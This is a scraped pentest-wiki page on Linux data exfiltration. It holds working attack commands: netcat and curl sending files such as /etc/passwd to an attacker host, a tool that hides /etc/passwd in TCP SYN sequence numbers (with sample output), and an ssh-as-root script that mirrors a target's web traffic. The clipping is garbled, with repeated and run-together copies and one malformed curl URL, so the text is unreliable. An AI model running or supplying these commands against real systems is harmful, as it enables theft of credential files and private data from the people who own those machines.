- https://pentestwiki.org/data-exfiltration/
author:">created: 2022-04-19T19:55:46 (UTC +08:00)
tags: []
source: https://pentestwiki.org/data-exfiltration/
author: - ✅ Data Exfiltration - pentestwiki.org
- 1 [Read from file “at:x”] [Encoded SEQ #: 0x61743a78] [Wrote 74 bytes]
- 2 [Read from file “:25:”] [Encoded SEQ #: 0x3a32353a] [Wrote 74 bytes]
- 3 [Read from file “25:B”] [Encoded SEQ #: 0x32353a42] [Wrote 74 bytes]
- 4 [Read from file “atch”] [Encoded SEQ #: 0x61746368] [Wrote 74 bytes]
- 5 [Read from file “ job”] [Encoded SEQ #: 0x206a6f62] [Wrote 74 bytes]
- 6 [Read from file “s da”] [Encoded SEQ #: 0x73206461] [Wrote 74 bytes]
- 7 [Read from file “emon”] [Encoded SEQ #: 0x656d6f6e] [Wrote 74 bytes]
- 8 [Read from file “:/va”] [Encoded SEQ #: 0x3a2f7661] [Wrote 74 bytes]
- 9 [Read from file “r/sp”] [Encoded SEQ #: 0x722f7370] [Wrote 74 bytes]
- 10 [Read from file “ool/“] [Encoded SEQ #: 0x6f6f6c2f] [Wrote 74 bytes]
- !/bin/bash sudo su -c “mkfifo /tmp/sharkfin” sudo su -c “chmod 777 /tmp/sharkfin” sudo su -c “wireshark -k -i /tmp/sharkfin &” ssh -i ~/.ssh/id_ssh -o StrictHostKeyChecking=no -p 22 root@192.168.1.1 “tcpdump -U -s0 -w - -i eth0 ‘port 80’” > /tmp/sharkfin
created: 2022-04-19T19:55:46 (UTC +08:00)
tags: []
source: https://pentestwiki.org/data-exfiltration/
author:
✅ Data Exfiltration - pentestwiki.org
Excerpt
Data Exfiltration in Linux Raw data exfiltration through port 443 On target machine: On attacker machine: HTTP POST data exfiltration through port 8080 On target machine: On attacker machine: Data exfiltration using TCP SYN We can use TCP SYN sequence number packets to exfiltrate data: https://github.com/defensahacker/syn-file Mirror target traffic on port 80 to a remote… Read more
Data Exfiltration in Linux
Raw data exfiltration through port 443
On target machine:
nc -nvv $IP 443 < input.txt
nc -nvv $IP 443 < input.txt
nc -nvv $IP 443 < input.txt
On attacker machine:
nc -nvlp 443 > input.txt
HTTP POST data exfiltration through port 8080
On target machine:
curl -T /etc/passwd http://:8080$IP
curl -T /etc/passwd http://:8080$IP
curl -T /etc/passwd http://$IP:8080
On attacker machine:
nc -nvlp 8080 | tee passwd
nc -nvlp 8080 | tee passwd
nc -nvlp 8080 | tee passwd
Data exfiltration using TCP SYN
We can use TCP SYN sequence number packets to exfiltrate data:
$ ./syn-file -i eth0 -d 192.168.1.158 -f /etc/passwd -p 8080 -P 8081 -m 00:0C:0A:4a:3b:5c
1 [Read from file “at:x”] [Encoded SEQ #: 0x61743a78] [Wrote 74 bytes]
2 [Read from file “:25:”] [Encoded SEQ #: 0x3a32353a] [Wrote 74 bytes]
3 [Read from file “25:B”] [Encoded SEQ #: 0x32353a42] [Wrote 74 bytes]
4 [Read from file “atch”] [Encoded SEQ #: 0x61746368] [Wrote 74 bytes]
5 [Read from file “ job”] [Encoded SEQ #: 0x206a6f62] [Wrote 74 bytes]
6 [Read from file “s da”] [Encoded SEQ #: 0x73206461] [Wrote 74 bytes]
7 [Read from file “emon”] [Encoded SEQ #: 0x656d6f6e] [Wrote 74 bytes]
8 [Read from file “:/va”] [Encoded SEQ #: 0x3a2f7661] [Wrote 74 bytes]
9 [Read from file “r/sp”] [Encoded SEQ #: 0x722f7370] [Wrote 74 bytes]
10 [Read from file “ool/“] [Encoded SEQ #: 0x6f6f6c2f] [Wrote 74 bytes]
$ ./syn-file -i eth0 -d 192.168.1.158 -f /etc/passwd -p 8080 -P 8081 -m 00:0C:0A:4a:3b:5c using interface: eth0 #1 [Read from file “at:x”] [Encoded SEQ #: 0x61743a78] [Wrote 74 bytes] #2 [Read from file “:25:”] [Encoded SEQ #: 0x3a32353a] [Wrote 74 bytes] #3 [Read from file “25:B”] [Encoded SEQ #: 0x32353a42] [Wrote 74 bytes] #4 [Read from file “atch”] [Encoded SEQ #: 0x61746368] [Wrote 74 bytes] #5 [Read from file “ job”] [Encoded SEQ #: 0x206a6f62] [Wrote 74 bytes] #6 [Read from file “s da”] [Encoded SEQ #: 0x73206461] [Wrote 74 bytes] #7 [Read from file “emon”] [Encoded SEQ #: 0x656d6f6e] [Wrote 74 bytes] #8 [Read from file “:/va”] [Encoded SEQ #: 0x3a2f7661] [Wrote 74 bytes] #9 [Read from file “r/sp”] [Encoded SEQ #: 0x722f7370] [Wrote 74 bytes] #10 [Read from file “ool/“] [Encoded SEQ #: 0x6f6f6c2f] [Wrote 74 bytes] […]
$ ./syn-file -i eth0 -d 192.168.1.158 -f /etc/passwd -p 8080 -P 8081 -m 00:0C:0A:4a:3b:5cusing interface: eth0#1 [Read from file "at:x"] [Encoded SEQ #: 0x61743a78] [Wrote 74 bytes]#2 [Read from file ":25:"] [Encoded SEQ #: 0x3a32353a] [Wrote 74 bytes]#3 [Read from file "25:B"] [Encoded SEQ #: 0x32353a42] [Wrote 74 bytes]#4 [Read from file "atch"] [Encoded SEQ #: 0x61746368] [Wrote 74 bytes]#5 [Read from file " job"] [Encoded SEQ #: 0x206a6f62] [Wrote 74 bytes]#6 [Read from file "s da"] [Encoded SEQ #: 0x73206461] [Wrote 74 bytes]#7 [Read from file "emon"] [Encoded SEQ #: 0x656d6f6e] [Wrote 74 bytes]#8 [Read from file ":/va"] [Encoded SEQ #: 0x3a2f7661] [Wrote 74 bytes]#9 [Read from file "r/sp"] [Encoded SEQ #: 0x722f7370] [Wrote 74 bytes]#10 [Read from file "ool/"] [Encoded SEQ #: 0x6f6f6c2f] [Wrote 74 bytes][...]
Mirror target traffic on port 80 to a remote host
sudo su -c “mkfifo /tmp/sharkfin”
sudo su -c “chmod 777 /tmp/sharkfin”
sudo su -c “wireshark -k -i /tmp/sharkfin &”
ssh -i ~/.ssh/id_ssh -o StrictHostKeyChecking=no -p 22 root@192.168.1.1 “tcpdump -U -s0 -w - -i eth0 ‘port 80’” > /tmp/sharkfin
!/bin/bash sudo su -c “mkfifo /tmp/sharkfin” sudo su -c “chmod 777 /tmp/sharkfin” sudo su -c “wireshark -k -i /tmp/sharkfin &” ssh -i ~/.ssh/id_ssh -o StrictHostKeyChecking=no -p 22 root@192.168.1.1 “tcpdump -U -s0 -w - -i eth0 ‘port 80’” > /tmp/sharkfin
#!/bin/bashsudo su -c "mkfifo /tmp/sharkfin"sudo su -c "chmod 777 /tmp/sharkfin"sudo su -c "wireshark -k -i /tmp/sharkfin &"ssh -i ~/.ssh/id_ssh -o StrictHostKeyChecking=no -p 22 root@192.168.1.1 "tcpdump -U -s0 -w - -i eth0 'port 80'" > /tmp/sharkfin
Data Exfiltration in Windows
若有收获,就点个赞吧
0 人点赞
